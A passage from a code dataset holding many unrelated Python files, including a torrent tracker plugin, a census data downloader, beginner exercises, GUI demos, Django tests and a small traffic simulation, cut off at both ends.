Exception('TrackerPluginMixinBase can be applied only to TrackerPluginBase classes')\n super(TrackerPluginMixinBase, self).__init__()\n\n\n# noinspection PyUnresolvedReferences\nclass ExecuteWithHashChangeMixin(TrackerPluginMixinBase):\n def __init__(self):\n super(ExecuteWithHashChangeMixin, self).__init__()\n if not hasattr(self.topic_class, 'hash'):\n raise Exception(\"ExecuteWithHashMixin can be applied only to TrackerPluginBase class \"\n \"with hash attribute in topic_class\")\n\n def execute(self, topics, engine):\n \"\"\"\n :param topics: result of get_topics func\n :type engine: engine.EngineTracker\n :return: None\n \"\"\"\n with engine.start(len(topics)) as engine_topics:\n for i in range(0, len(topics)):\n topic = topics[i]\n topic_name = topic.display_name\n with engine_topics.start(i, topic_name) as engine_topic:\n changed = False\n if hasattr(self, 'check_changes'):\n changed = self.check_changes(topic)\n if not changed:\n continue\n\n prepared_request = self._prepare_request(topic)\n download_kwargs = dict(self.tracker_settings.get_requests_kwargs())\n if isinstance(prepared_request, tuple) and len(prepared_request) >= 2:\n if prepared_request[1] is not None:\n download_kwargs.update(prepared_request[1])\n prepared_request = prepared_request[0]\n response, filename = download(prepared_request, **download_kwargs)\n if hasattr(self, 'check_download'):\n status = self.check_download(response)\n if topic.status != status:\n self.save_status(topic.id, status)\n engine_topic.status_changed(topic.status, status)\n if status != Status.Ok:\n continue\n elif response.status_code != 200:\n raise Exception(u\"Can't download url. Status: {}\".format(response.status_code))\n if not filename:\n filename = topic_name\n torrent_content = response.content\n if not is_torrent_content(torrent_content):\n headers = ['{0}: {1}'.format(k, v) for k, v in six.iteritems(response.headers)]\n engine.failed(u'Downloaded content is not a torrent file.
\\r\\n'\n u'Headers:
\\r\\n{0}'.format(u'
\\r\\n'.join(headers)))\n continue\n torrent = Torrent(torrent_content)\n old_hash = topic.hash\n if torrent.info_hash != old_hash:\n with engine_topic.start(1) as engine_downloads:\n try:\n last_update = engine_downloads.add_torrent(0, filename, torrent, old_hash,\n TopicSettings.from_topic(topic))\n engine.downloaded(u\"Torrent {0} was changed\".format(topic_name), torrent_content)\n topic.hash = torrent.info_hash\n topic.last_update = last_update\n self.save_topic(topic, last_update, Status.Ok)\n except Exception as e:\n log.error(\"Error while add downloading torrent to client\", topic_name=topic_name,\n exception=str(e))\n engine.failed(u\"Torrent {0} was changed, but can't be added, error: {1}\"\n .format(topic_name, str(e)))\n elif changed:\n engine.info(u\"Torrent {0} was determined as changed, but torrent hash wasn't\"\n .format(topic_name))\n self.save_topic(topic, None, Status.Ok)\n\n\nclass LoginResult(Enum):\n Ok = 1\n CredentialsNotSpecified = 2\n IncorrentLoginPassword = 3\n InternalServerError = 500\n ServiceUnavailable = 503\n Unknown = 999\n\n def __str__(self):\n if self == LoginResult.Ok:\n return u\"Ok\"\n if self == LoginResult.CredentialsNotSpecified:\n return u\"Credentials not specified\"\n if self == LoginResult.IncorrentLoginPassword:\n return u\"Incorrent login/password\"\n if self == LoginResult.InternalServerError:\n return u\"Internal server error\"\n if self == LoginResult.ServiceUnavailable:\n return u\"Service unavailable\"\n return u\"Unknown\"\n\n\n# noinspection PyUnresolvedReferences\nclass WithCredentialsMixin(with_metaclass(abc.ABCMeta, TrackerPluginMixinBase)):\n credentials_class = None\n credentials_public_fields = ['username']\n credentials_private_fields = ['username', 'password']\n\n credentials_form = [{\n 'type': 'row',\n 'content': [{\n 'type': 'text',\n 'model': 'username',\n 'label': 'Username',\n 'flex': 50\n }, {\n \"type\": \"password\",\n \"model\": \"password\",\n \"label\": \"Password\",\n \"flex\": 50\n }]\n }]\n\n @abc.abstractmethod\n def login(self):\n \"\"\"\n :rtype: LoginResult\n \"\"\"\n\n @abc.abstractmethod\n def verify(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n\n def get_credentials(self):\n with DBSession() as db:\n dbcredentials = db.query(self.credentials_class).first()\n if dbcredentials is None:\n return None\n return row2dict(dbcredentials, None, self.credentials_public_fields)\n\n def update_credentials(self, credentials):\n with DBSession() as db:\n dbcredentials = db.query(self.credentials_class).first()\n if dbcredentials is None:\n dbcredentials = self.credentials_class()\n db.add(dbcredentials)\n dict2row(dbcredentials, credentials, self.credentials_private_fields)\n return self.login()\n\n def execute(self, ids, engine):\n if not self._execute_login(engine):\n return\n super(WithCredentialsMixin, self).execute(ids, engine)\n\n def _execute_login(self, engine):\n if not self.verify():\n engine.info(u\"Credentials/Settings are not valid\\nTry login.\")\n login_result = self.login()\n if login_result == LoginResult.CredentialsNotSpecified:\n engine.info(u\"Credentials not specified\\nSkip plugin\")\n return False\n if login_result != LoginResult.Ok:\n engine.failed(u\"Can't login: {}\".format(login_result))\n return False\n engine.info(u\"Login successful\")\n return True\n engine.info(u\"Credentials/Settings are valid\")\n return True\n","sub_path":"monitorrent/plugins/trackers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"215776179","text":"import wx\nimport os\nimport gettext\nimport iH2O_DataProcessor_GUI as gui\nimport drift_precision\n\nclass MyApp(wx.App):\n def OnInit(self):\n wx.InitAllImageHandlers()\n self.mainFrame = gui.clsMainFrame(None, wx.ID_ANY, \"\")\n self.mainFrame.Show()\n\n\n # Setup GUI\n computer_name = os.environ['COMPUTERNAME']\n self.mainFrame.statusbar.SetStatusText(computer_name, 2)\n\n\n # Menu Events\n wx.EVT_MENU(self, gui.ID_EXIT, self.OnMenuExit)\n\n \n return True\n\n\n def OnMenuExit(self, event):\n self.mainFrame.Close()\n\n\nif __name__ == \"__main__\":\n gettext.install(\"app\")\n app = MyApp(False)\n app.MainLoop()\n","sub_path":"MainGUI.py","file_name":"MainGUI.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"117427320","text":"import csv\r\nimport _sqlite3\r\n\r\nconn = _sqlite3.connect(\"employee.db\")\r\nmycursor = conn.cursor()\r\nprint(\"opened database successfully\")\r\nprint(_sqlite3.sqlite_version)\r\ntab = \"\"\"CREATE TABLE employee(id INT NOT NULL PRIMARY KEY, name VARCHAR, salary INT NOT NULL PRIMARY KEY)\"\"\"\r\nmycursor.execute(tab)\r\n\r\n\r\nfor row in csv.reader(open('employee.csv', 'r'), delimiter=','):\r\n if row:\r\n val1 = row[0]\r\n val2 = row[1]\r\n val3 = row[2]\r\n # print(val)\r\n mycursor.execute(\"INSERT INTO employee VALUES(?,?,?)\", (val1, val2, val3))\r\n # mycursor.execute(sql, val)\r\n mycursor.execute(\"SELECT * FROM employee\")\r\n result = mycursor.fetchall()\r\n print(result)","sub_path":"task 20.py","file_name":"task 20.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"272058937","text":"## 2. Enumerate ##\n\nships = [\"Andrea Doria\", \"Titanic\", \"Lusitania\"]\ncars = [\"Ford Edsel\", \"Ford Pinto\", \"Yugo\"]\n\nfor i,ship in enumerate(ships):\n print(ship)\n print(cars[i])\n\n## 3. Adding Columns ##\n\nthings = [[\"apple\", \"monkey\"], [\"orange\", \"dog\"], [\"banana\", \"cat\"]]\ntrees = [\"cedar\", \"maple\", \"fig\"]\n\nfor i, thing in enumerate(things):\n thing.append(trees[i])\n \nprint(things)\n\n## 4. List Comprehensions ##\n\napple_prices = [100, 101, 102, 105]\n\napple_prices_doubled=[price*2 for price in apple_prices]\napple_prices_lowered=[price-100 for price in apple_prices]\n\n## 5. Counting Female Names ##\n\nname_counts={}\n\nfor item in legislators:\n if item[3]==\"F\" and int(item[2].split(\"-\")[0])>1940:\n name=item[1]\n if name in name_counts:\n name_counts[name]=name_counts[name]+1\n else:\n name_counts[name]=1\n \n \n\n\n## 7. Comparing with None ##\n\nvalues = [None, 10, 20, 30, None, 50]\nchecks = []\n\nfor item in values:\n a = item is not None and item>30\n checks.append(a)\n\n## 8. Highest Female Name Count ##\n\nmax_value=None\n\nfor key in name_counts:\n count=name_counts[key]\n if max_value is None or count>=max_value:\n max_value=count\n \n \n\n## 9. The Items Method ##\n\nplant_types = {\"orchid\": \"flower\", \"cedar\": \"tree\", \"maple\": \"tree\"}\n\nfor name,oftype in plant_types.items():\n print(name,oftype)\n\n## 10. Finding the Most Common Female Names ##\n\ntop_female_names = []\n\nfor item in name_counts:\n if name_counts[item]==2:\n top_female_names.append(item)\n \n \n\n## 11. Finding the Most Common Male Names ##\n\ntop_male_names = []\nmale_name_counts={}\n\n\nfor item in legislators:\n if item[3]==\"M\" and item[7]>1940:\n name=item[1]\n if name in male_name_counts:\n male_name_counts[name]=male_name_counts[name]+1\n else:\n male_name_counts[name]=1\n \nhighest_male_count=None\n\nfor name,count in male_name_counts.items():\n if highest_male_count is None or count>=highest_male_count:\n highest_male_count=count\n\nprint(max_value)\n\nfor name,count in male_name_counts.items():\n if count ==highest_male_count:\n top_male_names.append(name)\n \n \n \n ","sub_path":"2-python-programming-intermediate/List Comprehensions-16.py","file_name":"List Comprehensions-16.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"374084790","text":"\nimport collections\nimport ftplib\nimport itertools\nimport os\nimport sqlite3\nimport sys\nimport time\nimport traceback\nimport zipfile\n\n\ndef setup_geocode_table(verbose):\n '''This sets up the geocoding database.\n\n Args:\n verbose: True/False for whether function outputs info.\n Returns:\n None\n Raises:\n None\n\n This function first downloads a geographic header file for each state. It\n then downloads file 00002 for each state. These are downloaded in zip\n format, and then unzipped. It then creates two tables, geocode_data and\n logical_race_data and populates the database. The geocode_data contains\n data for geographic areas. The logical record from the geocode_data\n directly correlates with a specific population in the geographic area,\n which is broken down by race.\n\n '''\n \n # For 'Other race\" Iterative Proportional Fitting is used. Costants here.\n OTHER_RACE_HISPANIC_RATE = float(11.1)/100\n OTHER_RACE_WHITE_RATE = float(70.5)/100\n OTHER_RACE_BLACK_RATE = float(11.3)/100\n OTHER_RACE_API_RATE = float(7.0)/100\n OTHER_RACE_AI_RATE = float(.9)/100\n OTHER_RACE_MULTIRACIAL_RATE = float(.8)/100\n \n if verbose is True:\n sys.stdout.write('Downloading census files ... \\t\\t\\n')\n # Created named tuple for organizing\n home_dir_path = os.path.expanduser(\"~\")\n data_dir_path = os.path.join(home_dir_path, '.surgeo')\n # Download files from census server.\n ftp = ftplib.FTP('ftp.census.gov')\n ftp.login()\n ftp.cwd('census_2000/datasets/Summary_File_1')\n # List dir\n state_list = ftp.nlst()\n time.sleep(0)\n # Drop all elements prior to states\n state_list = itertools.dropwhile(lambda x: x != 'Alabama', state_list)\n # Make dropwhile object to list\n state_list = list(state_list)\n zip_files_downloaded = []\n for state in state_list:\n time.sleep(0)\n ftp.cwd('/')\n ftp.cwd(''.join(['census_2000/datasets/Summary_File_1',\n '/',\n state]))\n file_list = ftp.nlst()\n for item in file_list:\n time.sleep(0)\n if '00002_uf1.zip' in item or 'geo_uf1.zip' in item:\n if verbose is True:\n print(''.join(['Downloading ', item]))\n file_path = os.path.join(data_dir_path, item)\n zip_files_downloaded.append(file_path)\n ftp.retrbinary('RETR ' + item, open(file_path, 'wb+').write)\n if verbose is True:\n sys.stdout.write('\\t\\t\\t\\t\\tOK\\n')\n # unzip files\n for zipfile_path in zip_files_downloaded:\n time.sleep(0)\n # Name of XXgeo_uf1.zip --> XXgeo.uf1\n # Name of XX00002_uf1.zip --> XX0000.uf1\n file_component = os.path.basename(zipfile_path).replace('.zip', '')\n file_component = file_component.replace('_', '.')\n if verbose is True:\n print('Writing {}'.format(file_component))\n dir_component = os.path.dirname(zipfile_path)\n # Zip file is now and iterator to save on ram.\n with zipfile.ZipFile(zipfile_path, 'r') as f:\n with f.open(file_component, 'r') as f2:\n with open(os.path.join(dir_component,\n file_component),\n 'w+b') as f3:\n for line in f2:\n f3.write(line)\n # Now everything has been downloaded. Start commit to db\n try:\n db_path = os.path.join(os.path.expanduser('~'),\n '.surgeo',\n 'census.db')\n connection = sqlite3.connect(db_path)\n cursor = connection.cursor()\n cursor.execute('''CREATE TABLE IF NOT EXISTS\n geocode_data(id INTEGER PRIMARY KEY,\n state TEXT, summary_level TEXT, logical_record TEXT,\n zcta TEXT)''')\n cursor.execute('''CREATE TABLE IF NOT EXISTS logical_race_data(id\n INTEGER PRIMARY KEY, state TEXT, logical_record TEXT,\n num_white REAL, num_black REAL, num_ai REAL,\n num_api REAL, num_hispanic REAL, num_multi REAL)''')\n # now start loading to db\n list_of_filenames = os.listdir(data_dir_path)\n number_of_filenames = len(list_of_filenames)\n for index, filename in enumerate(list_of_filenames):\n time.sleep(0)\n # First the geographic header file\n if 'geo.uf1' in filename:\n if verbose is True:\n try:\n last_write\n except NameError:\n last_write = 1\n if index > last_write:\n sys.stdout.write('\\rWriting geoheader: {} of {}'\n .format(index,\n number_of_filenames))\n last_write = index\n file_path = os.path.join(data_dir_path,\n filename)\n #\n DESIRED_SUMMARY_LEVEL = '871'\n # Only latin1 appears to work, even thoug site specifies ascii\n with open(file_path, 'r', encoding='latin-1') as f3:\n for line in f3:\n time.sleep(0)\n state = line[6:8]\n summary_level = line[8:11]\n logical_record = line[18:25]\n zcta = line[160:165]\n # Only ZCTA wide numbers considered\n if not summary_level == DESIRED_SUMMARY_LEVEL:\n continue\n cursor.execute('''INSERT INTO geocode_data(id,\n state, summary_level, logical_record,\n zcta) VALUES(NULL, ?, ?, ?, ?)''',\n (state,\n summary_level,\n logical_record,\n zcta))\n if verbose is True:\n sys.stdout.write('\\rWriting geoheader: {} of {}\\n'.format\n (number_of_filenames, number_of_filenames))\n for index, filename in enumerate(list_of_filenames):\n time.sleep(0)\n # First the geographic header file\n if '00002.uf1' in filename:\n if verbose is True:\n try:\n last_write\n last_write = 1\n except NameError:\n last_write = 1\n if index > last_write:\n sys.stdout.write('\\rWriting race data: {} of {}'\n .format(index,\n number_of_filenames))\n sys.stdout.flush()\n last_write = index\n file_path = os.path.join(data_dir_path,\n filename)\n with open(file_path, 'r', encoding='latin-1') as f4:\n for line in f4:\n # Remainder db input\n table_p8 = line.split(',')[86:103]\n state = line[5:7]\n logical_record = line[15:22]\n # Need to translate \"Other race\" into one of the\n # six categories through proportional fitting.\n num_other = table_p8[7]\n OTHER_RACE_HISPANIC_RATE\n OTHER_RACE_WHITE_RATE\n OTHER_RACE_BLACK_RATE\n OTHER_RACE_API_RATE\n OTHER_RACE_AI_RATE\n OTHER_RACE_MULTIRACIAL_RATE\n other_hispanic = str(round(int(num_other) * \n OTHER_RACE_HISPANIC_RATE))\n other_white = str(round(int(num_other) * \n OTHER_RACE_WHITE_RATE))\n other_black = str(round(int(num_other) * \n OTHER_RACE_BLACK_RATE))\n other_api = str(round(int(num_other) * \n OTHER_RACE_API_RATE))\n other_ai = str(round(int(num_other) * \n OTHER_RACE_AI_RATE))\n other_multiracial = str(round(int(num_other) * \n OTHER_RACE_MULTIRACIAL_RATE))\n # Breaking up table p8\n total_pop = table_p8[0]\n total_not_hispanic = table_p8[1]\n num_white = str(int(table_p8[2]) + int(other_white))\n num_black = str(int(table_p8[3]) + int(other_black))\n num_ai = str(int(table_p8[4]) + int(other_ai))\n num_asian = table_p8[5]\n num_pacisland = table_p8[6]\n num_api = str(int(num_asian) + \n int(num_pacisland) +\n int(other_api))\n num_other = table_p8[7]\n num_multi = str(int(table_p8[8]) + \n int(other_multiracial))\n num_hispanic = str(int(table_p8[9]) +\n int(other_hispanic)) \n cursor.execute('''INSERT INTO logical_race_data(\n id, state, logical_record,\n num_white, num_black,\n num_ai, num_api,\n num_hispanic, num_multi) VALUES(\n NULL, ?, ?, ?, ?, ?, ?, ?, ?)''',\n (state,\n logical_record,\n num_white,\n num_black,\n num_ai,\n num_api,\n num_multi,\n num_hispanic))\n if verbose is True:\n sys.stdout.write('\\rWriting blockfile: {} of {}\\n'\n .format(number_of_filenames, number_of_filenames))\n sys.stdout.write('Creating indices ... \\t\\t\\t')\n sys.stdout.flush()\n cursor.execute('''CREATE INDEX IF NOT EXISTS zcta_index ON\n geocode_data(zcta)''')\n cursor.execute('''CREATE INDEX IF NOT EXISTS logical_record_index ON\n logical_race_data(logical_record)''')\n sys.stdout.write('OK\\n')\n # Now commit\n connection.commit()\n connection.close()\n except sqlite3.Error as e:\n traceback.print_exc()\n connection.rollback()\n connection.close()\n raise e\n","sub_path":"surgeo/db/db_setup_geocode.py","file_name":"db_setup_geocode.py","file_ext":"py","file_size_in_byte":11289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"283794361","text":"# www.NeatChange.com\n# Make a difference in your life !\n#\n# Poplar Oct 7 2016\n# Scale 进阶\n\nfrom tkinter import *\n\n\nroot = Tk()\nroot.title(\"Scale\")\n\ns1 = Scale(root, from_=0, to=42, tickinterval=10, resolution=5) # 设置刻度为10精度为5\ns1.pack()\ns2 = Scale(root, from_=0, to=200, orient=HORIZONTAL, length=600) # 设置显示长度为600像素\ns2.pack()\n\nroot.mainloop()\n\n","sub_path":"Study/Python/Python库/标准库/Tkinter库/组件/Scale-游标/Scale进阶.py","file_name":"Scale进阶.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"372927945","text":"def main():\n\n userNum = -1 #Initialize variable for user input\n\n while userNum < 0: #Verification loop for user input\n userNum = int(input(\"Enter a positive number: \"))\n if userNum < 0:\n print(\"Invalid number\")\n\n \n print(fibIter(userNum)) #fibIter functuion call\n\ndef fibIter(userNum):\n if userNum == 0: #first fib number is 0\n return 0 \n elif userNum == 1: #Second fib number is 1\n return 1\n elif userNum == 2: #Third fib number is 1\n return 1\n elif userNum == 3: #4th fib number is 2\n return 2\n elif userNum > 3: # Iterative loop for fib sequence\n fn = 0\n fn1 = 1\n fn2 = 2\n for i in range(3, userNum): #Loop for numbers between 3 and user input\n fn = fn1 + fn2 #Fib sequence definition\n fn1 = fn2 #Swap\n fn2 = fn\n return fn\n else:\n return -1\n\nmain()\n","sub_path":"algorithms/AlgorithmsProject-master/project1/ESSJ1B.py","file_name":"ESSJ1B.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"307770637","text":"#Alex Reutter finds brokenness in text output method\nfrom Xml.Xslt import test_harness\n\nsheet_1 = \"\"\"\n\n\n\n\n]]>\n\n\n\"\"\"\n\nsource_1 = \"\"\"\"\"\"\n\nexpected_1 = ''\n\n\ndef Test(tester):\n source = test_harness.FileInfo(string=source_1)\n sheet = test_harness.FileInfo(string=sheet_1)\n test_harness.XsltTest(tester, source, [sheet], expected_1,\n title='text output method bug')\n return\n","sub_path":"dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/ar_20001110.py","file_name":"ar_20001110.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"593338379","text":"def nStream(l: [], N: int) -> []:\n # invalid input\n if N < 0 or not isinstance(N, int):\n raise Exception(\"N has to be a positive integer\")\n\n #handle empty master list\n result = []\n if len(l) == 0:\n for _ in range(N):\n result.append([])\n return result\n\n minItems = int(len(l)/N)\n currentIndex = 0\n group = 0\n\n while group < N and currentIndex < len(l):\n result.append(l[currentIndex:currentIndex+minItems])\n currentIndex += minItems\n group += 1\n\n # having lefftover\n while currentIndex < len(l):\n pos = currentIndex % N\n result[pos].append(l[currentIndex])\n currentIndex += 1\n\n return result\n\nprint(nStream([],3))","sub_path":"week6/nStream/nStream.py","file_name":"nStream.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"378717256","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError\nfrom nose.tools import raises, assert_equals, assert_not_equals, assert_true, nottest\nfrom api.models import Procedure, Page\nfrom utils import factories\n\n\nclass ProcedureTest(TestCase):\n def setUp(self):\n self.test_user = User.objects.create_user(\n 'TestUser',\n 'test@sanaprotocolbuilder.me',\n 'testpassword'\n )\n self.test_user.save()\n\n self.test_procedure1 = Procedure.objects.create(\n author='tester',\n title='test procedure 1',\n owner=self.test_user\n )\n self.test_procedure1.save()\n\n self.test_procedure2 = Procedure.objects.create(\n author='tester',\n title='test procedure 2',\n owner=self.test_user\n )\n self.test_procedure2.save()\n\n def test_create_page(self):\n page = Page.objects.create(\n display_index=0,\n procedure=self.test_procedure1\n )\n\n assert_equals(page.display_index, 0)\n assert_equals(page.procedure, self.test_procedure1)\n assert_not_equals(page.last_modified, None)\n assert_not_equals(page.created, None)\n\n @raises(IntegrityError)\n def test_display_index_none(self):\n Page.objects.create(\n display_index=None,\n procedure=self.test_procedure1\n )\n\n @raises(IntegrityError)\n def test_procedure_none(self):\n Page.objects.create(\n display_index=0\n )\n\n @nottest\n @raises(IntegrityError)\n def test_display_index_uniqueness(self):\n Page.objects.create(\n display_index=0,\n procedure=self.test_procedure1\n )\n\n Page.objects.create(\n display_index=0,\n procedure=self.test_procedure1\n )\n\n def test_updates_last_modified(self):\n page = factories.PageFactory()\n original_last_modified = page.last_modified\n\n factories.ElementFactory(\n page=page\n )\n\n assert_true(original_last_modified < page.last_modified)\n","sub_path":"src-backend/api/tests/test_model_page.py","file_name":"test_model_page.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418461206","text":"# Basic interpreter\n\nimport os\nimport subprocess\nfrom parse import *\nfrom analyze import analyze_command\nimport importlib\n\ndef prepare_cmd():\n\t# Prepares console\n\tos.system(\"@echo off\")\n\tos.system(\"cls\")\n\ndef get_current_directory():\n\t# Get the current directory (to be displayed before user input field)\n\tos.system(\"cd>current_cd\")\n\tf = open(\"current_cd\", \"r\")\n\tcd = \"\"\n\tfor line in f:\n\t\tif not line == \"\":\n\t\t\tcd = line\n\treturn cd\n\ndef get_commands_loop():\n\t# Interpreter loop\n\tcommand = input(get_current_directory().strip() + \": \")\n\tparsed_command = parse_command(command)\n\t# Returns true if this is a valid ELang command\n\tif analyze_command(parsed_command):\n\t\t# lang_dict.txt contains comma-separated-values in the style (command,program_name)\n\t\tprogram_name = match_command(parsed_command)\n\t\tinterpret(parsed_command, program_name)\n\t\tget_commands_loop()\n\telse:\n\t\tprint(\"*ERROR: Command \" + command + \" was not found!*\")\n\ndef interpret(command, program_name):\n\tmodule = program_name + \".py\"\n\timportlib.import_from(module, \"main_functionality\")\n\tmain_functionality(command)\n\nprepare_cmd()\nget_commands_loop()","sub_path":"interp.py","file_name":"interp.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"477104223","text":"from tkinter import *\n\nroot = Tk()\nscrollbar = Scrollbar(root)\nscrollbar.pack(side = RIGHT, fill = Y)\ntext = Text(root, height=20, width = 50)\n\ntext.pack(side = LEFT, fill = BOTH)\nscrollbar.config(command = text.yview)\ndata = \"\"\"slkadfj aldkfj\nasdlfkj\nadflkj\ndsfkj\nkdzlkcxv\noieu\n1283uas\n049ulkjha\nadfkhkjxhzv\nadflkjhp09u\"\"\"\ntext.insert(END, data)\ndef wt():\n text.insert(END, \"button\\n\")\n\nb = Button(root,text='test',command = wt)\nb.pack()\nroot.mainloop()\n","sub_path":"scrollbar2.py","file_name":"scrollbar2.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"22119070","text":"import simulator\nfrom simulator.simulator import Simulator\n\nclass Simulation:\n\n def __init__(self):\n self.nodes = []\n self.node_conversion = {}\n\n\n def add_node(self, node):\n build = node.build()\n self.node_conversion[node] = build\n self.nodes.append(build)\n return self\n\n\n def add_road(self, road):\n build = road.build()\n\n # Link the start\n start_build = self.node_conversion[road.start]\n simulator.link(start_build, build[0])\n # Link the end\n end_build = self.node_conversion[road.end]\n simulator.link(build[-1], end_build)\n\n self.nodes.remove(end_build)\n self.nodes.extend(build)\n self.nodes.append(end_build)\n return self\n\n\n def add_path(self, path):\n node = self.node_conversion[path.departure]\n directions = [0] * (path.departure.possible_destinations[path.junctions[0]][1] + 1)\n for i in range(len(path.junctions) - 1):\n index, length = path.junctions[i].possible_destinations[path.junctions[i + 1]]\n directions.append(index)\n directions.extend([0] * length)\n total_proportion = max(node.paths.keys()) if len(node.paths) >= 1 else 0\n node.paths[total_proportion + path.proportion] = simulator.Path(directions)\n\n\n def run_for(self, ticks):\n s = Simulator(self.nodes)\n s.run(ticks)\n\n def run_graphical_for(self, ticks):\n s = Simulator(self.nodes)\n s.run_graphical(ticks)\n","sub_path":"modeler/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"332844845","text":"n = int(input())\nL = list(map(int, input().split()))\nL.sort()\nans = 0\n\nsets = set()\nfor i in range(n):\n l = L[i]\n for j in L[i+1:]:\n sets.add((l, j))\n\nTFline = [False for i in range(10**3 + 1)]\nNumline = [0 for i in range(10**3 + 1)]\nfor l in L:\n TFline[l] = True\n if Numline[l] < 3:\n Numline[l] += 1\n\nTNumLine = [0]\nfor i in range(1, 10**3 + 1):\n TNumLine.append(TNumLine[-1] + 1 if TFline[i] else TNumLine[-1])\n\nfor lines in sets:\n minline = min(lines)\n maxline = max(lines)\n if not abs(minline - maxline):\n if Numline[minline] == 3:\n ans += 1\n ans += TNumLine[minline-1] - TNumLine[min(abs(minline - maxline), minline-1)]\n else:\n if Numline[minline] >= 2 and abs(minline - maxline) + minline > maxline:\n ans += 1\n ans += TNumLine[minline-1] - TNumLine[min(abs(minline - maxline), minline-1)]\n \nprint(ans)\n","sub_path":"contest/abc143/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"237959641","text":"#Encoding:UTF-8\n#Autor: Paola Castillo Nacif\n#Descripcion:El programa mostrara el descuento realizado en la compra de cierta cantidad de paquetes de Software\n\ndef calcularNeg(paq):\n mensaje=\"\"\n if paq<0:\n mensaje=\"error\"\n else:\n mensaje=\"\"\n return mensaje\n\ndef calcularDesc(paq):\n if paq>=0 and paq<10:\n desc=0\n elif paq>=10 and paq<=19:\n desc=(paq*1500)*0.20\n elif paq>=20 and paq<=49:\n desc=(paq*1500)*0.30\n elif paq>=50 and paq<=99:\n desc=(paq*1500)*0.40\n elif paq>=100:\n desc=(paq*1500)*0.50\n return desc\n\ndef calcularCosto(paq):\n if paq>=0 and paq<10:\n costo=(paq*1500)\n elif paq>=10 and paq<=19:\n costo=(paq*1500)-((paq*1500)*0.20)\n elif paq>=20 and paq<=49:\n costo=(paq*1500)-((paq*1500)*0.30)\n elif paq>=50 and paq<=99:\n costo=(paq*1500)-((paq*1500)*0.40)\n elif paq>=100:\n costo=(paq*1500)-((paq*1500)*0.50)\n return costo\n\n \ndef main():\n paq=int(input(\"Inserte cantidad de paquetes de Software a comprar\"))\n errorn=calcularNeg(paq)\n desc=calcularDesc(paq)\n totalp=calcularCosto(paq)\n print(errorn)\n print(\"su descuento es de:\",\"$\",\"%.2f\"%desc)\n print(\"Su total es de:\",\"$\",\"%.2f\"%totalp)\nmain()\n ","sub_path":"VentaDeSoftware.py","file_name":"VentaDeSoftware.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"531056275","text":"from django.contrib import admin\n\nfrom ega.models import (\n EgaUser,\n League,\n LeagueMember,\n Match,\n Prediction,\n Team,\n TeamStats,\n Tournament,\n)\n\n\nclass LeagueMemberInline(admin.TabularInline):\n model = LeagueMember\n extra = 0\n\n\nclass LeagueAdmin(admin.ModelAdmin):\n list_display = ('name', 'slug')\n inlines = [LeagueMemberInline]\n\n\nclass TeamAdmin(admin.ModelAdmin):\n prepopulated_fields = dict(slug=('name',))\n\n\nclass MatchAdmin(admin.ModelAdmin):\n list_filter = ('tournament', 'when')\n\n\nclass TournamentAdmin(admin.ModelAdmin):\n filter_horizontal = ('teams',)\n prepopulated_fields = dict(slug=('name',))\n\n\nadmin.site.register(EgaUser)\nadmin.site.register(League, LeagueAdmin)\nadmin.site.register(Match, MatchAdmin)\nadmin.site.register(Prediction)\nadmin.site.register(Team, TeamAdmin)\nadmin.site.register(TeamStats)\nadmin.site.register(Tournament, TournamentAdmin)\n","sub_path":"ega/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"219304398","text":"import turtle\nimport random\nturtle.shape(\"triangle\")\nturtle.hideturtle()\nturtle.forward(0)\nturtle.speed(0)\nx = 2\na = 13\n\nfor i in range(1, 2000):\n\n turtle.forward(x)\n turtle.left(a)\n turtle.forward(x-random.randint(1, 16))\n turtle.left(a+(random.randint(-15, 15)))\n x = (x + 1)/5\n\n\n\n\n\nturtle.exitonclick()\n","sub_path":"PycharmProjects/pythonProject0001/lesson0005.py","file_name":"lesson0005.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"29891588","text":"__author__ = 'liuWei'\n\nfrom pip._vendor import requests\n\nclass login:\n\n header = {\n \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n 